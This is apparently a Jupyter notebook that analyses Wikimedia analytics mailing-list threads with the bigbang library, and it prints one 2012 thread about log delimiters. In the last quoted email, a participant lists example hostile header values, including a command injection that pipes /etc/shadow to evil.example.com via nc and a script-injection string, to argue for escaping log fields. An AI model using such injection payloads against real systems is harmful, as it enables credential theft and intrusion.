In [1]:
%matplotlib inline
from bigbang.archive import Archive
from bigbang.thread import Thread
from bigbang.thread import Node
import matplotlib.pyplot as plt
import datetime

First, collect data from a public email archive.


In [2]:
url = "https://lists.wikimedia.org/pipermail/analytics/"
arx = Archive(url,archive_dir="../archives")

We can easily count the number of threads in the archive. The first call to Archive.get_threads may take some time to compute, but the result is cached in the Archive object.


In [3]:
#threads = arx.get_threads()
len(arx.get_threads())


Out[3]:
628

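We can plot a histogram of the number of messages in each thread. For mailing lists this distribution is typically heavy-tailed: most threads are short and a few are very long, a shape that is often approximated by a power law.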


In [4]:
y = [t.get_num_messages() for t in arx.get_threads()]

plt.hist(y, bins=30)
plt.xlabel('number of messages in a thread')
plt.show()
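
A quick, informal way to see how close the thread sizes are to a power law is to fit a straight line to the size frequencies on log-log axes. The sketch below is only a rough diagnostic, not a rigorous statistical test; the helper name `loglog_slope` and the toy data are assumptions made for illustration and are not part of bigbang.

```python
import math
from collections import Counter

def loglog_slope(sizes):
    """Least-squares slope of log(frequency) against log(size).

    `sizes` is a list of positive integers (e.g. messages per thread)
    with at least two distinct values.
    """
    freq = Counter(sizes)
    xs = [math.log(size) for size in freq]
    ys = [math.log(count) for count in freq.values()]
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    num = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    den = sum((x - mean_x) ** 2 for x in xs)
    return num / den

# Toy data built so that frequency = 64 / size**2 (an exact power law).
toy_sizes = [1] * 64 + [2] * 16 + [4] * 4 + [8] * 1
slope = loglog_slope(toy_sizes)
print(round(slope, 6))  # -2.0
```

On the real data, the list `y` computed above could be passed in place of `toy_sizes`. A roughly constant negative slope is consistent with a power law but does not prove one.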


We can also plot the number of people participating in each thread. Here, the participants are differentiated by the From: header on the emails they've sent.


In [5]:
n = [t.get_num_people() for t in arx.get_threads()]

plt.hist(n, bins=20)
plt.xlabel('number of email addresses in a thread')
plt.show()
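
Counting participants by their From: header means one person writing from two addresses is counted twice, while differences in display name or letter case should not matter. The sketch below shows one way to count distinct addresses with the standard library. It is an illustration only and not necessarily how `get_num_people` is implemented; `count_participants` and the example headers are hypothetical.

```python
from email.utils import parseaddr

def count_participants(from_headers):
    """Count distinct email addresses in a list of From: header values."""
    # parseaddr returns (display_name, address); keep the address, lowercased.
    addresses = {parseaddr(header)[1].lower() for header in from_headers}
    addresses.discard("")  # drop headers that could not be parsed
    return len(addresses)

# Hypothetical headers: the first two refer to the same address.
headers = [
    "Ada Example <ada@example.org>",
    "ada@example.org",
    "Bob Example <BOB@example.org>",
]
print(count_participants(headers))  # 2
```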


The duration of a thread is the amount of elapsed time between its first and last message.


In [6]:
y = [t.get_duration().days for t in arx.get_threads()]

plt.hist(y, bins=10)
plt.xlabel('duration of a thread (days)')
plt.show()



In [7]:
# total_seconds() gives the full elapsed time; .seconds is only the sub-day remainder
y = [t.get_duration().total_seconds() for t in arx.get_threads()]

plt.hist(y, bins=10)
plt.xlabel('duration of a thread (seconds)')
plt.show()
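
When measuring durations in seconds, it helps to keep in mind how `datetime.timedelta` splits its value. Assuming, as the `.days` attribute used above suggests, that `get_duration()` returns a `timedelta`, the standalone example below shows the difference between `.days`, `.seconds`, and `.total_seconds()`. The duration used here is made up for illustration.

```python
from datetime import timedelta

# An illustrative duration of 2 days, 19 hours, 49 minutes and 47 seconds.
d = timedelta(days=2, hours=19, minutes=49, seconds=47)

print(d.days)             # 2        (whole days only)
print(d.seconds)          # 71387    (remainder after removing whole days)
print(d.total_seconds())  # 244187.0 (full elapsed time in seconds)
```

Because `.seconds` never exceeds 86399, `.total_seconds()` is the value that reflects the full length of a thread lasting longer than a day.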


You can examine the properties of a single thread.


In [8]:
print(arx.get_threads()[0].get_duration())


19:49:47

In [9]:
content = arx.get_threads()[0].get_root().data['Body']
content


Out[9]:
'Welcome to the the inaugural Analytics Mailing list email.\n\nHere all your analytics wishes comes true, \n\n\nso proposals, ideas, crazy ideas, crazy crazy ideas are welcome here!\nas long as we can count something it is welcome. \n\n\nD\n\n'

In [10]:
len(content.split())


Out[10]:
38

Suppose we want to know whether longer threads (those containing more messages) have fewer words per message.


In [11]:
# Threads with fewer than 6 messages count as short; the rest count as long.
short_threads = []
long_threads = []
for t in arx.get_threads():
    if t.get_num_messages() < 6:
        short_threads.append(t)
    else:
        long_threads.append(t)

In [12]:
print(len(short_threads))
print(len(long_threads))


471
157

You can get the content of a thread like this:


In [13]:
long_threads[0].get_content()


Out[13]:
["(Moving this to analytics list, cause uhhh, why not?)\nOk some more info!\nI was testing some of my changes to udp-filter on my test labs instance, and hey!  whadyaknow!  The test failed.  One of the failures was due to the content type field not matching correctly.  It looked like this:\n  text/html; charset=UTF-8\nAnd actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace.  It was the semi-colon in the text/html string that caused the test to fail.\nI started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages.  I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset. \nSo I'm pretty sure the setting of the value of this header is coming directly from Mediawiki.  But, that isn't really our issue.  Headers are allowed to have spaces in the values.\nHere's some example log output with spaces in headers.\n  https://gist.github.com/2648312\n  \nSummary:\nNginx:  \n- Does not escape spaces in Content-Type\n- Does not escape spaces in Accept-Language\n- Does not escape spaces in any header (afaict*).\nVarnish:\n- Does not escape space in Content-Type\n+ Escapes spaces in Accept-Langage\n+ Escapes spaces in any header (afaict).\nSquid:\n~ Removes charset from Content-Type header (?)\n+ Escapes spaces in Accept-Language.\n+ Escapes spaces in any header (afaict).\nThe remaining question we need to answer:  Do we want to patch source code for these guys in order to fix this problem?  I'd rather not if we don't have to.  Do we have to?  Uhhh, dunno!\n-Ao\n*As Far As I Can Tell\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120509/189be49e/attachment-0001.html>\n",
 'Do we really need to write code? Don\'t all of these servers have a directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)\nRelatedly, did you happen to try testing other whitespace characters? I suspect some subset of tabs \\t, vertical tabs \\v, and/or the line break family \\r\\n\\f get escaped consistently. (The stream modifiers \\b\\c\\h\\w are illegal.) If we were to figure that out, we could just switch to that character as the field delimiter and be done with it.\nps. It turns out it\'s legal to split header-values across newlines so long as the first character following the CRLF is a space or tab. So we might want to deal with that. Just sayin\'. (It\'s called Linear White Space -- LWS.)\nSome potentially useful HTTP RFC links:\n- LWS: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2\n- Modified BNF definition: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2\n- The Content-Type definition, which talks about "extended" attributes in values, separated by semi-colons: http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.7\n- Header definitions: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14\npps. For what it\'s worth, the C source to nginx\'s HTTP header parser is available:\n- ngx_http_parse_header_line: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_http_parse.c#l813\n- ngx_http_parse_multi_header_lines: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_http_parse.c#l1666\n--\nDavid Schoonover\ndsc at wikimedia.org\n',
 "Yeah, that's what we want to do.  Robla is worried that changing the log format using tabs will break things for too many people.  Gotta find out how many and who.\n",
 'So far nobody has responded to my inquiry on whether they would be affected\nby this chance. So please let us know if you are consuming a server log and\nyou are expecting spaces as delimiters. We want to make sure that we are\naware of all the people that will be affected by this.\nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/609520e2/attachment-0001.html>\n',
 "There are more suggestions hanging in the air waiting to be shot down.\n \nCharacter replacement in c is very cheap. \nSo why not feed Diederik's filter with tab delimited data, and export space\ndelimited data?\n \nThe filter first replaces all (non delimiting) spaces by underscores, then\nreplaces all (delimiting) tabs by spaces.\n \nSimple, and downwards compatible.\n \nErik\n \nFrom: analytics-bounces at lists.wikimedia.org\n[mailto:analytics-bounces at lists.wikimedia.org] On Behalf Of Diederik van\nLiere\nSent: Thursday, May 10, 2012 3:57 PM\nTo: analytics at lists.wikimedia.org\nSubject: Re: [Analytics] Using tab as delimiter instead of space in the log\nfiles\n \nSo far nobody has responded to my inquiry on whether they would be affected\nby this chance. So please let us know if you are consuming a server log and\nyou are expecting spaces as delimiters. We want to make sure that we are\naware of all the people that will be affected by this.\n \nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/a60d63f4/attachment.html>\n",
 "I'd be cool with making this a flag to udp-filter, ja.  I wouldn't want to turn it on by default, but totally cool with that.  \n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/4347dfa4/attachment.html>\n",
 "Hi Erik,\nYes it is downwards compatible but does not outweigh the drawbacks. It's\nnot simple, as it creates a disconnect between the configuration of the\nserver log and the actual output. In addition, it is not a future proof\nsolution because we also want to stream the server log data to the\nanalytics cluster and then we will be still stuck with the same problem (as\nstreaming the data into the analytics cluster will not depend on the\nudp-filter software). We should apply a real solution not a monkey patch.\nD\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/f6db12ec/attachment-0001.html>\n",
 "Well, he's still suggesting we switch to tab as delimiter in sources.  Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/fb939b8f/attachment.html>\n",
 'I don\'t think charsub is all that complex or scary. However, I think substituting in _ is a really bad idea.\n** Once you do this, you cannot undo it, because _ is a valid character in all fields[1]. **\nAnd for some data, there\'s a huge difference. It may be obvious that "text/html;_charset_=_utf8" is "text/html; charset = utf8", but in the case of a client sending a URL that isn\'t properly URL-encoded, the meaning of the request is totally changed if you convert "http://wikimedia.org/ " (which should have been encoded by the sending client to "http://wikimedia.org/%20") to "http://wikimedia.org/_". But there\'s no inversion function: you don\'t know to if "http://wikimedia.org/_" is "http://wikimedia.org/ " or really, actually "http://wikimedia.org/_".\nSo the obvious next question is: why not escape them ourselves? Because now you need a string copy, as escaping isn\'t 1:1 in characters (" " becomes "\\ " (or whatever), which is more than one character). This comes back to what I was asking before: is there any whitespace character that is escaped by all our log sources? (My suspicion is that either \\r, \\n, or \\v is escaped by everyone.)\nIf we can\'t find a whitespace character, using a non-semantic control character (0x0-0x31) should work, but it\'s riskier as some downstream consumers might choke on non-printable characters. Still: the best option here, hands down, is Bell (\\a 0x07). Most unix programs understand it but don\'t do anything scary with it, and it doesn\'t change the meaning of the string. (We might make random machines beep. I am okay with this.) Additionally, it doesn\'t match \'\\s\' in PCRE, which some people might be using to split the output.\nIf for some reason Bell isn\'t acceptable, Form Feed (\\f 0x0C) is probably our next-best option. Unfortunately, it matches \'\\s\', and (heh) prints as six newlines. (But if you\'re printing our logs, god help you.) 
Using any of the rest is sketchy, though with some testing, the Device Control characters (0x11-0x14) might be okay.\n[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 -- "Many HTTP/1.1 header field values consist of words separated by LWS or special characters."\n       CHAR           = <any US-ASCII character (octets 0-127)>\n       CTL            = <any US-ASCII control character (octets 0-31 + 127)>\n       token          = 1*<any CHAR except CTLs or separators>\n       separators     = "(" | ")" | "<" | ">" | "@"\n                      | "," | ";" | ":" | "\\" | <">\n                      | "/" | "[" | "]" | "?" | "="\n                      | "{" | "}" | SP | HT\nSee also: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14\n--\nDavid Schoonover\ndsc at wikimedia.org\n',
 'Guys, this is turning into a complete bike-shed discussion.\nI suggest the following:\n1) We move to the tab character as delimiter, this not 100% accurate but\nwill cause way way way fewer issues than space\n2) We will extensively test this in the Labs environment where we have\nnginx/varnish/squid running\n3) We will notify all log consumers before hand, about 2 weeks notice.\n4) We will give Erik Zachte ample time to adjust and we supply him test\ndata. The two weeks notice starts as soon as Erik has given thumbs up.\nHow does that sound?\nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/d88d4325/attachment-0001.html>\n',
 'Also, the spaces -> _, tabs -> spaces underscore might be cool (or using whatever characters dsc suggests), but we don\'t have to think about that right now.  That would be an add on to udp-filter, and Erik said in a previous email that he wouldn\'t mind changing to split("\\t").\nSo.  spaces -> tabs it is.  :)\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/48b56c05/attachment.html>\n',
 "Diederik just asked me to check if I could reproduce the problem of spaces in logs for a request like this:\n  https://en.m.wikipedia.org/wiki/Extensor_carpi radialis longus\nAnswer:  nginx does not escape the spaces in the url.\nBut don't blame nginx!  nginx is just being honest!  The HTTP header had spaces in it, so it printed the spaces to the log file.  I think nginx did exactly what it was supposed to.   As David pointed out, it is allowed to have any whitespace  (even newlines) in an HTTP header.  Shouldn't the loggers just output what they see?  \nUsing tabs as the delimiter wouldn't solve the problem for ALL cases.  It is possible to put tabs in headers, (right?).  But for 99.999999% (that is a statistically researched number, don't question it) of cases, using tabs as delimiter would solve this problem.\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/5c9a240e/attachment-0001.html>\n",
 'No, nginx should print that output in a context-appropriate fashion.\nFun possible http header fields:\n" ; cat /etc/shadow | nc evil.example.com 80\n<javascript>alert(\'whee!\');</javascript>\nNow, that\'s not to say that it\'s likely that we have vulnerabilities\nin these areas.  However, context matters, and printing spaces in a\nspace-delimited file is ...um... suboptimal.\nIt looks like the default for nginx is space-delimited, but to put\nquote marks around user input:\nhttp://wiki.nginx.org/HttpLogModule\n...which is a pretty fragile strategy (though perhaps less fragile\nthan not putting quote marks as we do).\nI agree with Andrew that we shouldn\'t maintain a patched version of\nnginx logging code.  However, if we submitted a patch for optionally\nescaping spaces in header fields, it seems pretty plausible that it\'d\nbe accepted.\nI suppose this would be fine.  I would recommend, though, making sure\nwe contact everyone listed as contacts in the filters list on locke,\nemery, and oxygen.\nRob\n']

How would you test whether longer threads contain fewer words per message than shorter ones?
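
One possible approach, sketched here rather than offered as the definitive answer, is to compute the mean number of words per message for each thread and compare the two groups with a permutation test. The helper names `words_per_message` and `permutation_p_value` are hypothetical, and the toy lists stand in for what `t.get_content()` returns (a list of message bodies, as in Out[13]).

```python
import random
from statistics import mean

def words_per_message(messages):
    """Mean whitespace-delimited word count over a thread's message bodies."""
    return mean(len(body.split()) for body in messages)

def permutation_p_value(short_vals, long_vals, n_iter=5000, seed=0):
    """One-sided p-value for 'long threads have fewer words per message'.

    Repeatedly shuffles the group labels and counts how often the shuffled
    difference in means is at least as large as the observed one.
    """
    rng = random.Random(seed)
    observed = mean(short_vals) - mean(long_vals)
    pooled = list(short_vals) + list(long_vals)
    k = len(short_vals)
    hits = 0
    for _ in range(n_iter):
        rng.shuffle(pooled)
        if mean(pooled[:k]) - mean(pooled[k:]) >= observed:
            hits += 1
    return hits / n_iter

# Toy stand-ins for [t.get_content() for t in short_threads] and long_threads.
toy_short = [["one two three four", "five six"], ["a b c d e f"]]
toy_long = [["hi", "ok then", "yes", "no", "maybe so", "fine"]]

short_vals = [words_per_message(m) for m in toy_short]
long_vals = [words_per_message(m) for m in toy_long]
p_value = permutation_p_value(short_vals, long_vals)
print(mean(short_vals), mean(long_vals), p_value)
```

With the real archive, `toy_short` and `toy_long` would be replaced by the contents of `short_threads` and `long_threads`. A small p-value would suggest that the lower word count in long threads is unlikely to be due to chance alone. Note that quoted replies and scrubbed-attachment notices in the bodies inflate the word counts and may need to be stripped first.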


In [ ]: